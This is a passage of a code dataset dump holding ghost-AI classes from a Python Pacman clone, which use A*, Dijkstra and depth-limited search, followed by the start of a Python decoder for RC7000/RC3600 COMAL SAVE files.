4))\r\n\r\n elif self.modes['scatter']:\r\n self.scatter(self.home)\r\n\r\n elif self.modes['eaten']:\r\n self.eaten()\r\n\r\n\r\nclass Clyde(Ghost):\r\n def __init__(self, node):\r\n super().__init__(node)\r\n self.name = 'Clyde'\r\n self.colour = ORANGE\r\n 
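# Added note: this mirrors the arcade Clyde rule -- update() below chases the\r\n        # player's tile while total_distance > 8 and otherwise retreats toward\r\n        # self.home, e.g. each tick is just clyde.update(player).\r\n        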
self.orientation = LEFT\r\n self.home = Node(ROWS - 1, 0)\r\n self.reset_mode(2)\r\n self.sheet = clyde_sheet\r\n\r\n\r\n def update(self, player):\r\n if self.modes['chase']:\r\n distance = total_distance(self.node, player)\r\n print(distance, \"-->\")\r\n if distance <= 8:\r\n self.scatter(self.home)\r\n print(\"scattering\")\r\n else:\r\n print(\"chasing\")\r\n if player.curr_direction == UP:\r\n n = Node(player.node.row - 4, player.node.col)\r\n self.chase(n)\r\n elif player.curr_direction == DOWN:\r\n n = Node(player.node.row + 4, player.node.col)\r\n self.chase(n)\r\n elif player.curr_direction == LEFT:\r\n n = Node(player.node.row, player.node.col - 4)\r\n self.chase(n)\r\n elif player.curr_direction == RIGHT:\r\n n = Node(player.node.row, player.node.col + 4)\r\n self.chase(n)\r\n\r\n\r\n elif self.modes['scatter']:\r\n self.scatter(self.home)\r\n\r\n elif self.modes['eaten']:\r\n self.eaten()\r\n\r\n\r\nclass Inky(Ghost):\r\n def __init__(self, node):\r\n super().__init__(node)\r\n self.name = 'Inky'\r\n self.colour = TEAL\r\n self.orientation = RIGHT\r\n self.home = Node(ROWS - 1, COLUMNS - 1)\r\n self.reset_mode(2)\r\n self.sheet = inky_sheet\r\n\r\n # based on the formula 2[(p+2) - b] + b where p is the player position, b is blinky's position and +2 denotes 2 spaces in front of the player dependent on current direction\r\n\r\n def update(self, player, blinky):\r\n if self.modes['chase']:\r\n if player.curr_direction == LEFT:\r\n pos = [(2 * (player.node.row - blinky.node.row)) + blinky.node.row,\r\n (2 * ((player.node.col - 2) - blinky.node.col)) + blinky.node.col]\r\n self.chase(Node(pos[0], pos[1]))\r\n\r\n elif player.curr_direction == RIGHT:\r\n pos = [(2 * (player.node.row - blinky.node.row)) + blinky.node.row,\r\n (2 * ((player.node.col + 2) - blinky.node.col)) + blinky.node.col]\r\n self.chase(Node(pos[0], pos[1]))\r\n\r\n elif player.curr_direction == DOWN:\r\n pos = [(2 * ((player.node.row + 2) - blinky.node.row)) + blinky.node.row,\r\n (2 * (player.node.col - blinky.node.col)) + blinky.node.col]\r\n self.chase(Node(pos[0], pos[1]))\r\n\r\n\r\n elif player.curr_direction == UP:\r\n pos = [(2 * ((player.node.row - 2) - blinky.node.row)) + blinky.node.row,\r\n (2 * (player.node.col - blinky.node.col)) + blinky.node.col]\r\n self.chase(Node(pos[0], pos[1]))\r\n\r\n\r\n elif self.modes['scatter']:\r\n self.scatter(self.home)\r\n\r\n elif self.modes['eaten']:\r\n self.eaten()\r\n\r\n\r\nclass AdvancedGhost(Ghost):\r\n def __init__(self, path_colour, node):\r\n super().__init__(node)\r\n self.path_colour = path_colour\r\n\r\n def move(self):\r\n print(self.curr_path_idx)\r\n self.node = self.path[self.curr_path_idx][0]\r\n self.orientation = self.path[self.curr_path_idx][1]\r\n self.node.colour = BLACK\r\n self.pos = self.node.pos\r\n self.curr_path_idx += 1\r\n\r\n def set_path_visible(self, window): #MAYBE CHANGE THIS SO THAT IF THE COLOUR OF THE PATH IS SET TO SOMETHING DIFFERENT THAN THE CURRENT MAZE COLOUR THEN DONT OVERRIDE.\r\n for node in self.path:\r\n if not node[0].is_path(): #IF NODE.COLOUR == BLACK\r\n node[0].colour = self.path_colour #node.colour = self.path_colour\r\n node[0].draw(window)\r\n\r\n def reset_path_colour(self):\r\n for node in self.path:\r\n node[0].colour = BLACK #node.colour = BLACK\r\n\r\n def reset(self):\r\n self.reset_path_colour()\r\n self.curr_path_idx = 0\r\n self.path = []\r\n\r\n\r\nclass SuperElroy(AdvancedGhost):\r\n def __init__(self, path_colour, node):\r\n super().__init__(path_colour, node)\r\n self.name = \"SuperElroy\"\r\n 
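# Added note: this ghost replays a precomputed A* route -- get_path() calls\r\n        # Astar(self.node, player.node).run(graph) once, move() then follows it node by\r\n        # node, and the route is only rebuilt after curr_path_idx runs off its end,\r\n        # e.g. one tick is ghost.update(player, window, graph, path_visible).\r\n        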
self.path_colour = LIGHT_GREEN\r\n self.orientation = UP\r\n self.home = Node(ROWS - 1, COLUMNS - 1)\r\n self.reset_mode(2)\r\n self.sheet = super_elroy_sheet\r\n self.path = []\r\n self.curr_path_idx = 0\r\n\r\n def update(self, player, window, graph, path_visible):\r\n if self.modes['chase']:\r\n if not self.path:\r\n self.path = self.get_path(player, graph)\r\n if path_visible:\r\n self.set_path_visible(window)\r\n self.move()\r\n\r\n else:\r\n if self.curr_path_idx > len(self.path) - 1: #edit here so that all the nodes in the path return to their original colour, for now set this to blue. Also change current path index to 0\r\n self.reset()\r\n self.path = self.get_path(player, graph)\r\n if path_visible:\r\n self.set_path_visible(window)\r\n self.move()\r\n\r\n else:\r\n self.move()\r\n\r\n elif self.modes['scatter']:\r\n self.scatter(self.home)\r\n\r\n elif self.modes['eaten']:\r\n self.eaten()\r\n\r\n\r\n\r\n def get_path(self, target, graph):\r\n path = Astar(self.node, target.node).run(graph)\r\n return path\r\n\r\n\r\n\r\nclass Brainless(AdvancedGhost): #make advanced ghost higher object which all these inherit from due to reusing methods.\r\n def __init__(self, path_colour, node):\r\n super().__init__(path_colour, node)\r\n self.name = \"Brainless\"\r\n self.orientation = LEFT\r\n self.sheet = brainless_sheet\r\n self.home = Node(0, COLUMNS-1)\r\n self.reset_mode(2)\r\n self.path = []\r\n self.curr_path_idx = 0\r\n self.path_colour = path_colour\r\n\r\n def update(self, player, window, path_visible):\r\n if self.modes['chase']:\r\n if not self.path:\r\n self.path = self.get_path(player)\r\n if path_visible:\r\n self.set_path_visible(window)\r\n self.move()\r\n\r\n else:\r\n if self.curr_path_idx > len(self.path) - 1: #edit here so that all the nodes in the path return to their original colour, for now set this to blue. Also change current path index to 0\r\n self.reset()\r\n self.path = self.get_path(player)\r\n if path_visible:\r\n self.set_path_visible(window)\r\n self.move()\r\n\r\n else:\r\n self.move()\r\n\r\n elif self.modes['scatter']:\r\n self.scatter(self.home)\r\n\r\n elif self.modes['eaten']:\r\n self.eaten()\r\n\r\n\r\n def get_path(self, target):\r\n return dls(self.node, target.node, limit=20)\r\n\r\n\r\n\r\n\r\n\r\nclass Patient(AdvancedGhost): #djisktra\r\n def __init__(self, path_colour, node):\r\n super().__init__(path_colour, node)\r\n self.name = \"Patient\"\r\n self.orientation = LEFT\r\n self.sheet = patient_sheet\r\n self.home = Node(ROWS-1, 0)\r\n self.reset_mode(2)\r\n self.path = []\r\n self.curr_path_idx = 0\r\n\r\n def update(self, player, window, graph, path_visible):\r\n if self.modes['chase']:\r\n if not self.path:\r\n self.path = self.get_path(player, graph)\r\n if path_visible:\r\n self.set_path_visible(window)\r\n self.move()\r\n\r\n else:\r\n if self.curr_path_idx > len(self.path) - 1: #edit here so that all the nodes in the path return to their original colour, for now set this to blue. 
Also change current path index to 0\r\n self.reset()\r\n self.path = self.get_path(player, graph)\r\n if path_visible:\r\n self.set_path_visible(window)\r\n self.move()\r\n\r\n else:\r\n self.move()\r\n\r\n elif self.modes['scatter']:\r\n self.scatter(self.home)\r\n\r\n elif self.modes['eaten']:\r\n self.eaten()\r\n\r\n\r\n\r\n def get_path(self, target, graph):\r\n path = Djikstra(self.node, target.node).run(graph, target)\r\n print(\"Dijkstra: \", path)\r\n return path[:10]\r\n\r\n\r\n\r\n\r\nclass Hurricane(AdvancedGhost): #TO BE TWEAKED: THE GENERAL IDEA IS TO HAVE SOME RADIUS, FOR NOW 10 TILES BEFORE A* SEARCH IS CALLED, AND OUTSIDE THIS RADIUS DFS IS CALLED.\r\n def __init__(self, path_colour, node):\r\n super().__init__(path_colour, node) #ALSO BUG FIX BECAUSE EATEN MODE DOESNT WORK HERE FOR SOME REASON\r\n self.name = \"Hurricane\"\r\n self.orientation = LEFT\r\n self.sheet = hurricane_sheet\r\n self.home = Node(0, 0)\r\n self.reset_mode(2)\r\n self.path = []\r\n self.curr_path_idx = 0\r\n\r\n def update(self, player, window, graph, path_visible):\r\n if self.modes['chase']:\r\n if not self.path:\r\n self.path = self.get_path(player, graph)\r\n if path_visible:\r\n self.set_path_visible(window)\r\n self.move()\r\n\r\n else:\r\n if self.curr_path_idx > len(self.path) - 1: #edit here so that all the nodes in the path return to their original colour, for now set this to blue. Also change current path index to 0\r\n self.reset()\r\n self.path = self.get_path(player, graph)\r\n if path_visible:\r\n self.set_path_visible(window)\r\n self.move()\r\n\r\n else:\r\n self.move()\r\n\r\n elif self.modes['scatter']:\r\n self.scatter(self.home)\r\n\r\n elif self.modes['eaten']:\r\n self.eaten()\r\n\r\n\r\n def get_algorithm(self, target):\r\n if total_distance(self.node, target) <= 15:\r\n return \"Astar\"\r\n return \"DLS\"\r\n\r\n\r\n def get_path(self, target, graph):\r\n curr = self.get_algorithm(target)\r\n if curr == \"Astar\":\r\n return Astar(self.node, target.node).run(graph)\r\n\r\n elif curr == \"DLS\":\r\n return dls(self.node, target.node, limit=30)\r\n","repo_name":"ThomasMTurner/Pacman-Plus","sub_path":"entities.py","file_name":"entities.py","file_ext":"py","file_size_in_byte":21805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70892909265","text":"'''\n RC7000/RC3600 COMAL SAVE files\n ------------------------------\n'''\n\nimport struct\n\nclass ComalSyntax(Exception):\n ''' COMAL syntax error '''\n\nTOPVAR = 0xdd\n\nCOMAL_TOKEN = {\n 0x0025: (0, \"DIGITS\", ),\n 0x0026: (0, \"RESET\", ),\n 0x0027: (0, \"PROTECT\", ),\n 0x0028: (0, \"LOWBOUND\", ),\n 0x0029: (0, \"CONNECT\", ),\n 0x002a: (0, \"RELEASE\", ),\n 0x002b: (0, \"DELAY\", ),\n 0x002c: (0, \"RENAME\", ),\n 0x002d: (1, \"TAB\", ),\n 0x002e: (0, \"PAGE\", ),\n 0x0030: (0, \"CREATE\", ),\n 0x0031: (0, \"DELETE\", ),\n 0x0032: (0, \"OF\", ),\n 0x0033: (0, \"ENDPROC\", ),\n 0x0034: (0, \"EXEC\", ),\n 0x0035: (0, \"PROC\", ),\n 0x0036: (0, \"ENDCASE\", ),\n 0x0037: (0, \"WHEN\", ),\n 0x0038: (0, \"CASE\", ),\n 0x0039: (0, \"ENDWHILE\", ),\n 0x003a: (0, \"ENDIF\", ),\n 0x003b: (0, \"UNTIL\", ),\n 0x003c: (0, \"REPEAT\", ),\n 0x003d: (0, \"WHILE\", ),\n 0x003e: (0, \"ELSE\", ),\n 0x003f: (0, \"DO\", ),\n 0x0041: (0, \"NEW\", ),\n 0x0042: (0, \"BYE\", ),\n 0x0043: (0, \"SAVE\", ),\n 0x0044: (0, \"ENTER\", ),\n 0x0045: (0, \"CHAIN\", ),\n 0x0046: (0, \"OPEN\", ),\n 0x0047: (0, \"CLOSE\", ),\n 0x0049: (0, \"RANDOMIZE\", ),\n 0x004a: (0, \"GOTO\", ),\n 0x004b: (0, 
\"GOSUB\", ),\n 0x004c: (0, \"IF\", ),\n 0x004d: (0, \"ON\", ),\n 0x004e: (0, \"CALL\", ),\n 0x004f: (0, \"STOP\", ),\n 0x0050: (0, \"DEF\", ),\n 0x0051: (0, \"END\", ),\n 0x0052: (0, \"RETURN\", ),\n 0x0053: (0, \"FOR\", ),\n 0x0054: (0, \"NEXT\", ),\n 0x0055: (0, \"DATA\", ),\n 0x0056: (0, \"REM\", ),\n 0x0057: (0, \"LET\", ),\n 0x0058: (0, \"MAT\", ),\n 0x0059: (0, \"DIM\", ),\n 0x005a: (0, \"RESTORE\", ),\n 0x005b: (0, \"INPUT\", ),\n 0x005c: (0, \"PRINT\", ),\n 0x005d: (0, \"READ\", ),\n 0x005e: (0, \"WRITE\", ),\n 0x005f: (1, \"ABS\", ),\n 0x0060: (1, \"SGN\", ),\n 0x0061: (1, \"RND\", ),\n 0x0062: (1, \"SQR\", ),\n 0x0063: (1, \"LOG\", ),\n 0x0064: (1, \"EXP\", ),\n 0x0065: (1, \"SIN\", ),\n 0x0066: (1, \"COS\", ),\n 0x0067: (1, \"ATN\", ),\n 0x0068: (1, \"TAN\", ),\n 0x0069: (1, \"DET\", ),\n 0x006a: (1, \"EOF\", ),\n 0x006b: (1, \"INT\", ),\n 0x006c: (1, \"SYS\", ),\n 0x006d: (1, \"ORD\", ),\n 0x006e: (1, \"CHR\", ),\n 0x0079: (1, \"LEN\", ),\n 0x007a: (0, \"TRN\", ),\n 0x007b: (5, \"INV\", ),\n 0x007c: (5, \"ZER\", ),\n 0x007d: (5, \"CON\", ),\n 0x007e: (5, \"IDN\", ),\n # 0x007f: (0, \"CONL\", ),\n # 0x0080: (0, \"RUN\", ),\n # 0x0081: (0, \"LIST\", ),\n # 0x0082: (0, \"SIZE\", ),\n # 0x0083: (0, \"AUTO\", ),\n # 0x0084: (0, \"RENUMBER\", ),\n # 0x0085: (0, \"RUNL\", ),\n # 0x0087: (0, \"BATCH\", ),\n # 0x0088: (0, \"SCRATCH\", ),\n # 0x0089: (0, \"LOAD\", ),\n # 0x008a: (0, \"EOJ\", ),\n # 0x008b: (0, \"TIME\", ),\n # 0x008d: (0, \"PUNCH\", ),\n # 0x0091: (0, \"INIT\", ),\n # 0x0092: (0, \"LOCK\", ),\n # 0x0093: (0, \"USERS\", ),\n # 0x0094: (0, \"LOOKUP\", ),\n # 0x0095: (0, \"COPY\", ),\n 0x00de: (0, \"FILE\", ),\n 0x00df: (0, \"ESC\", ),\n 0x00e0: (0, \"ERR\", ),\n 0x00e1: (0, \"USING\", ),\n 0x00e3: (2, \"OR\", ),\n 0x00e4: (0, \"TO\", ),\n 0x00e6: (0, \"STEP\", ),\n 0x00e7: (0, \"THEN\", ),\n 0x00e8: (2, \"AND\", ),\n 0x00ea: (1, \"<>\", ),\n 0x00eb: (1, \">\", ),\n 0x00ec: (1, \">=\", ),\n 0x00ed: (1, \"=\", ),\n 0x00ee: (1, \"<=\", ),\n 0x00ef: (1, \"<\", ),\n 0x00f0: (0, \";\", ),\n 0x00f1: (0, \",\", ),\n 0x00f2: (1, \"(\", ),\n 0x00f3: (1, \"(\", ),\n 0x00f6: (1, \")\", ),\n 0x00f7: (1, \")\", ),\n 0x00f8: (1, \"-\", ),\n 0x00f9: (1, \"+\", ),\n 0x00fa: (1, \"/\", ),\n 0x00fb: (1, \"*\", ),\n 0x00fc: (1, \"^\", ),\n 0x00fd: (2, \"MOD\", ),\n 0x00fe: (2, \"DIV\", ),\n 0x00ff: (2, \"NOT\", ),\n}\n\ndef isvar(n):\n ''' Does byte-string value represent a variable ? 
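(variables occupy the byte values 0x80 through TOPVAR == 0xdd, so e.g.\n        isvar(0x7f) is False while isvar(0x80) and isvar(0xdd) are True) 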
'''\n return 0x80 <= n <= TOPVAR\n\ndef get_token(n, flag=0):\n ''' Convert byte value to token, masked by flag '''\n token = COMAL_TOKEN.get(n)\n if token is None:\n return token\n if flag and not flag & token[0]:\n return None\n return token[1]\n\ndef number(b):\n ''' A floating point number (RCSL-43-GL-9698 2.5.1.1) '''\n i = struct.unpack(\">L\", bytes(b[:4]))[0]\n b.pop(0)\n b.pop(0)\n b.pop(0)\n b.pop(0)\n sign = -1 if i & (1<<31) else 1\n mantissa = (i & 0xffffff) / 2**24\n exponent = (i >> 24) & 0x07f\n value = sign * mantissa * 16**(exponent - 64)\n return \"%g\" % value\n\ndef string(b):\n ''' A String Constant '''\n assert b[0] == 0xe9\n b.pop(0)\n txt = '\"'\n length = b.pop(0)\n for _j in range(length):\n char = b.pop(0)\n glyph = {\n 0x22: \"<34>\",\n 0x3c: \"<60>\",\n 0x5b: \"Æ\",\n 0x5c: \"Ø\",\n 0x5d: \"Å\",\n 0x7b: \"æ\",\n 0x7c: \"ø\",\n 0x7d: \"å\",\n }.get(char)\n if glyph:\n txt += glyph\n elif 32 <= char <= 126:\n txt += \"%c\" % char\n else:\n txt += \"<%d>\" % char\n return txt + '\"'\n\n\nclass ComalStatement():\n ''' A single COMAL statement encode as byte sequence '''\n def __init__(self, up, lno, this):\n self.up = up\n self.lineno = lno\n self.this = this\n self.lvar = \"[LVAR]\"\n self.indent = 0\n self.outdent = 0\n\n def expect(self, stream, what):\n ''' Next byte should be token `what` '''\n tval = stream.pop(0)\n token = get_token(tval)\n if not token:\n raise ComalSyntax(\"Expected '%s' got 0x%02x'\" % (str(what), tval))\n if isinstance(what, str) and token != what:\n raise ComalSyntax(\"Expected '%s' got '%s'\" % (what, str(token)))\n if token not in what:\n raise ComalSyntax(\"Expected '%s' got '%s'\" % (str(what), str(token)))\n yield token\n\n def peek(self, stream, what):\n ''' Peek at next byte and see if it is token `what` '''\n tval = stream[0]\n token = get_token(tval)\n if not token:\n return False\n if isinstance(what, str) and token != what:\n return False\n if token not in what:\n return False\n stream.pop(0)\n return True\n\n def expect_comment(self, stream):\n ''' comment '''\n t = \"\"\n while stream and stream[0] != 0xe2:\n c = stream.pop(0)\n t += self.up.this.type_case.slugs[c].long\n yield t\n\n def expect_lineno(self, stream):\n ''' lineno '''\n if len(stream) & 1:\n stream.pop(0)\n lno = stream.pop(0) << 8\n lno |= stream.pop(0)\n yield \"%04d\" % lno\n\n def expect_string_expr(self, stream):\n ''' string_expr '''\n\n while stream and stream[0] != 0xe2:\n if stream[0] == 0xe9:\n yield string(stream)\n continue\n\n if isvar(stream[0]):\n yield from self.expect_var(stream)\n continue\n\n break\n\n def expect_expr(self, stream):\n ''' expr '''\n is_string = False\n parens = 0\n while stream:\n\n if stream[0] == 0xe2:\n break\n\n if not parens and get_token(stream[0]) == \")\":\n break\n\n if stream[0] in (0x7f, 0x40,):\n yield from self.expect_number(stream)\n continue\n\n if isvar(stream[0]):\n i = list(self.expect_var(stream))\n for j in i:\n if '$' in j:\n is_string = True\n yield from i\n continue\n\n if self.peek(stream, '('):\n parens += 1\n yield \"(\"\n continue\n\n if self.peek(stream, ')'):\n assert parens > 0\n parens -= 1\n yield \")\"\n continue\n\n if stream[0] == 0xe9:\n is_string = True\n yield string(stream)\n continue\n\n token = get_token(stream[0], 3)\n if token:\n yield token\n stream.pop(0)\n continue\n\n if is_string and self.peek(stream, \",\"):\n yield \",\"\n continue\n\n if 0x41 <= stream[0] <= 0x5d:\n yield \"FN%c\" % stream.pop(0)\n continue\n\n break\n\n def expect_file(self, stream):\n ''' FILE ( number [ 
, expr ] ) '''\n yield from self.expect(stream, \"FILE\")\n yield from self.expect(stream, \"(\")\n yield from self.expect_number(stream)\n if self.peek(stream, \",\"):\n yield \",\"\n yield from self.expect_expr(stream)\n yield from self.expect(stream, \")\")\n\n def expect_number(self, stream):\n ''' number '''\n if stream[0] == 0x40 and stream[1] == 0x00:\n stream.pop(0)\n stream.pop(0)\n yield \"0\"\n elif stream[0] == 0x7f:\n stream.pop(0)\n if len(stream) & 1:\n stream.pop(0)\n yield number(stream)\n else:\n assert False, \"expect_number: \" + bytes(stream).hex()\n\n def expect_var(self, stream):\n ''' var '''\n var = stream.pop(0)\n assert isvar(var), \"Bad Var 0x%02x\" % var\n assert var & 0x80, \"VAR 0x%02x\" % var\n if var == 0x80:\n yield self.lvar\n vno = var & 0x7f\n if vno < len(self.up.udas.variables):\n yield self.up.udas.variables[vno].name\n else:\n yield \"VAR_0x%02x\" % var\n if get_token(stream[0]) == \"(\":\n yield from self.expect(stream, \"(\")\n yield from self.expect_expr(stream)\n while get_token(stream[0]) == \",\":\n yield from self.expect(stream, \",\")\n yield from self.expect_expr(stream)\n yield from self.expect(stream, \")\")\n\n def render_bye(self, _stream):\n ''' BYE '''\n yield \"\"\n\n def render_call(self, stream):\n ''' CALL expr [ , expr ] ... '''\n yield from self.expect_string_expr(stream)\n while self.peek(stream, ','):\n yield \",\"\n yield from self.expect_expr(stream)\n\n def render_case(self, stream):\n ''' CASE expr OF '''\n self.indent += 1\n yield from self.expect_expr(stream)\n yield from self.expect(stream, \"OF\")\n\n def render_chain(self, stream):\n ''' CHAIN string_expr [ THEN GOTO lineno ] '''\n yield from self.expect_string_expr(stream)\n if stream and stream[0] != 0xe2:\n yield from self.expect(stream, 'THEN')\n yield from self.expect(stream, 'GOTO')\n yield from self.expect_lineno(stream)\n\n def render_connect(self, stream):\n ''' CONNECT string [ , expr ] '''\n yield from self.expect_string_expr(stream)\n if stream and stream[0] != 0xe2:\n yield from self.expect(stream, ',')\n yield from self.expect_expr(stream)\n\n def render_close(self, stream):\n ''' CLOSE [ file ] '''\n if stream and stream[0] != 0xe2:\n yield from self.expect_file(stream)\n\n def render_create(self, stream):\n ''' CREATE string , expr [ , expr ] '''\n yield from self.expect_string_expr(stream)\n yield from self.expect(stream, ',')\n yield from self.expect_expr(stream)\n if stream and stream[0] != 0xe2:\n yield from self.expect(stream, ',')\n yield from self.expect_expr(stream)\n\n def render_data(self, stream):\n ''' DATA expr [ , expr ] ... '''\n yield from self.expect_expr(stream)\n while self.peek(stream, ','):\n yield from self.expect_expr(stream)\n\n def render_def(self, stream):\n ''' DEF fn var = expr '''\n yield \"FN%c\" % stream.pop(0)\n yield '('\n yield \"VAR%02x\" % stream.pop(0)\n yield ')'\n yield from self.expect(stream, '=')\n yield from self.expect_expr(stream)\n\n def render_delay(self, stream):\n ''' DELAY expr '''\n yield from self.expect_expr(stream)\n\n def render_delete(self, stream):\n ''' DELETE string_expr '''\n yield from self.expect_string_expr(stream)\n\n def render_dim(self, stream):\n ''' DIM var [ , var ] ... 
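(e.g. DIM A(10), B(5, 5) fits this grammar; expect_var consumes each\n            name together with its parenthesised bounds) 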
'''\n while stream and stream[0] != 0xe2:\n yield from self.expect_var(stream)\n if not self.peek(stream, ','):\n break\n yield \",\"\n\n def render_enter(self, stream):\n ''' ENTER string_expr '''\n yield from self.expect_string_expr(stream)\n\n def render_else(self, stream):\n ''' ELSE [ comment ] '''\n self.indent += 1\n self.outdent += 1\n stream.pop(0)\n stream.pop(0)\n if stream:\n yield from self.expect_comment(stream)\n yield \"\"\n\n def render_end(self, stream):\n ''' END [ comment ]'''\n if stream:\n yield from self.expect_comment(stream)\n\n def render_endcase(self, stream):\n ''' ENDCASE [ comment ] '''\n self.outdent += 1\n if stream:\n yield from self.expect_comment(stream)\n yield \"\"\n\n def render_endif(self, stream):\n ''' ENDIF [ comment ] '''\n self.outdent += 1\n stream.pop(0)\n stream.pop(0)\n if stream:\n yield from self.expect_comment(stream)\n yield \"\"\n\n def render_endproc(self, stream):\n ''' ENDPROC [ comment ] '''\n self.outdent += 1\n stream.pop(0)\n stream.pop(0)\n if stream:\n yield from self.expect_comment(stream)\n\n def render_endwhile(self, stream):\n ''' ENDWHILE '''\n self.outdent += 1\n # XXX: Not obvious what the correct criteria is here\n # XXX: Could be original bug\n if len(stream) > 2:\n yield from self.expect_comment(stream)\n else:\n stream.pop(0)\n stream.pop(0)\n\n def render_exec(self, stream):\n ''' EXEC name '''\n yield from self.expect_var(stream)\n\n def render_for(self, stream):\n ''' FOR var = expr TO expr [ STEP expr ] '''\n self.indent += 1\n yield from self.expect_var(stream)\n yield from self.expect(stream, \"=\")\n yield from self.expect_expr(stream)\n yield from self.expect(stream, \"TO\")\n yield from self.expect_expr(stream)\n if stream[0] != 0xe2:\n yield from self.expect(stream, \"STEP\")\n yield from self.expect_expr(stream)\n\n def render_gosub(self, stream):\n ''' GOSUB lineno '''\n yield from self.expect_lineno(stream)\n\n def render_goto(self, stream):\n ''' GOTO lineno '''\n yield from self.expect_lineno(stream)\n\n def render_if(self, stream):\n ''' if expr THEN [ statement ] '''\n yield from self.expect_expr(stream)\n yield from self.expect(stream, \"THEN\")\n if stream[0] == 0xe2:\n self.indent += 1\n return\n yield from self.render_statement(stream)\n\n def render_input(self, stream):\n ''' INPUT string , var [ , string , var ] ... '''\n if get_token(stream[0]) == \"FILE\":\n yield from self.expect_file(stream)\n while stream and stream[0] != 0xe2:\n if stream[0] == 0xe9:\n yield from self.expect_string_expr(stream)\n yield from self.expect(stream, \",\")\n yield from self.expect_var(stream)\n if not stream or stream[0] == 0xe2:\n break\n yield from self.expect(stream, (\",\", \";\",))\n\n def render_let(self, stream):\n ''' LET var = expr [ ; var = expr ] ... '''\n while stream and stream[0] != 0xe2:\n yield from self.expect_var(stream)\n yield from self.expect(stream, \"=\")\n yield from self.expect_expr(stream)\n if not stream or stream[0] == 0xe2:\n break\n yield from self.expect(stream, (\";\", \",\",))\n\n def render_mat(self, stream):\n '''\n MAT PRINT var [ {,|;} var ] ... 
[ {,|;} ]\n MAT READ var [ , var ] ...\n MAT var = expr\n '''\n if self.peek(stream, \"PRINT\"):\n yield \"PRINT\"\n yield from self.expect_var(stream)\n while stream and stream[0] != 0xe2:\n yield from self.expect(stream, (\",\", \";\",))\n if not stream or stream[0] == 0xe2:\n break\n return\n\n\n if self.peek(stream, \"READ\"):\n yield \"READ\"\n if get_token(stream[0]) == \"FILE\":\n yield from self.expect_file(stream)\n yield from self.expect_var(stream)\n while self.peek(stream, ','):\n yield ','\n yield from self.expect_var(stream)\n return\n\n if isvar(stream[0]):\n yield from self.expect_var(stream)\n yield from self.expect(stream, \"=\")\n yield from self.expect_expr(stream)\n return\n\n def render_new(self, _stream):\n ''' NEW '''\n yield \"\"\n\n def render_next(self, stream):\n ''' NEXT var '''\n self.outdent += 1\n stream.pop(0)\n stream.pop(0)\n yield \"\"\n\n def render_on(self, stream):\n '''\n ON ( {ESC|ERR} THEN statement )\n ON expr\n '''\n if not stream[0]:\n stream.pop(0)\n yield from self.expect(stream, (\"ESC\", \"ERR\",))\n yield from self.expect(stream, \"THEN\")\n yield from self.render_statement(stream)\n else:\n n = stream.pop(0)\n yield from self.expect_expr(stream)\n yield from self.expect(stream, \"THEN\")\n yield from self.expect(stream, (\"GOTO\", \"GOSUB\"))\n for i in range(n):\n if i:\n yield \",\"\n yield from self.expect_lineno(stream)\n\n\n def render_open(self, stream):\n ''' OPEN file_mode [ , ] expr '''\n yield from self.expect_file(stream)\n yield from self.expect_expr(stream)\n\n def render_page(self, stream):\n ''' PAGE '''\n yield from self.expect(stream, \"=\")\n yield from self.expect_expr(stream)\n\n def render_proc(self, stream):\n ''' PROC name '''\n self.indent += 1\n yield from self.expect_var(stream)\n\n def render_protect(self, stream):\n ''' PROTECT = expr '''\n yield from self.expect(stream, '=')\n yield from self.expect_expr(stream)\n\n def render_print(self, stream):\n ''' PRINT [ file ] [ USING string_expr . ] [expr] [ {,|;} expr ] ... [{,|;}]'''\n if get_token(stream[0]) == \"FILE\":\n yield from self.expect_file(stream)\n if self.peek(stream, \"USING\"):\n yield from self.expect_string_expr(stream)\n yield from self.expect(stream, (\",\", \";\",))\n while stream and stream[0] != 0xe2:\n yield from self.expect_expr(stream)\n if stream and stream[0] != 0xe2:\n yield from self.expect(stream, (\",\", \";\",))\n else:\n break\n\n def render_randomize(self, _stream):\n ''' RANDOMIZE '''\n yield \"\"\n\n def render_read(self, stream):\n ''' READ [ file ] [ , ] var [ , var ] ... 
'''\n if get_token(stream[0]) == \"FILE\":\n yield from self.expect_file(stream)\n yield from self.expect_var(stream)\n while self.peek(stream, \",\"):\n yield \",\"\n yield from self.expect_var(stream)\n\n def render_release(self, _stream):\n ''' RELEASE '''\n yield \"\"\n\n def render_rem(self, stream):\n ''' REM comment '''\n yield from self.expect_comment(stream)\n\n def render_rename(self, stream):\n ''' RENAME string_expr , string_expr'''\n yield from self.expect_string_expr(stream)\n yield from self.expect(stream, ',')\n yield from self.expect_string_expr(stream)\n\n def render_repeat(self, stream):\n ''' REPEAT [ comment ]'''\n self.indent = 1\n stream.pop(0)\n stream.pop(0)\n if stream:\n yield from self.expect_comment(stream)\n yield \"\"\n\n def render_reset(self, stream):\n ''' RESET { ESC | ERR } '''\n yield from self.expect(stream, (\"ESC\", \"ERR\",))\n\n def render_restore(self, stream):\n ''' RESET lineno '''\n yield from self.expect_lineno(stream)\n\n def render_return(self, stream):\n ''' RETURN [ comment ]'''\n if stream:\n yield from self.expect_comment(stream)\n\n def render_save(self, stream):\n ''' SAVE [ string_expr ] '''\n yield from self.expect_string_expr(stream)\n\n def render_stop(self, stream):\n ''' STOP [ comment ] '''\n if stream:\n yield from self.expect_comment(stream)\n yield \"\"\n\n def render_tab(self, stream):\n ''' TAB expr '''\n yield from self.expect_expr(stream)\n\n def render_until(self, stream):\n ''' UNTIL expr '''\n self.outdent = 1\n yield from self.expect_expr(stream)\n\n def render_when(self, stream):\n ''' WHEN expr [ , expr ] ... '''\n self.outdent = 1\n self.indent = 1\n yield from self.expect_expr(stream)\n while self.peek(stream, \",\"):\n yield \",\"\n yield from self.expect_expr(stream)\n\n def render_while(self, stream):\n ''' WHILE expr [THEN] DO '''\n self.indent = 1\n yield from self.expect_expr(stream)\n yield from self.expect(stream, \"DO\")\n\n def render_write(self, stream):\n ''' WRITE [ file ] [ , ] expr [ , expr ] ... 
